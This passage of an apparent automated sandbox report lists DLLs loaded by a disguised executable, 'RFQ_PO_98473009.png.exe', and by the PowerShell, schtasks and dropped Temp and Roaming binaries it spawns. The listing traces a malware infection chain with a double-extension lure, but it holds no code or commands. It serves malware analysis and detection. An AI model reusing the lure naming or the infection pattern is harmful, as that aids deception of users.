                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: iconcodecservice.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: urlmon.dll
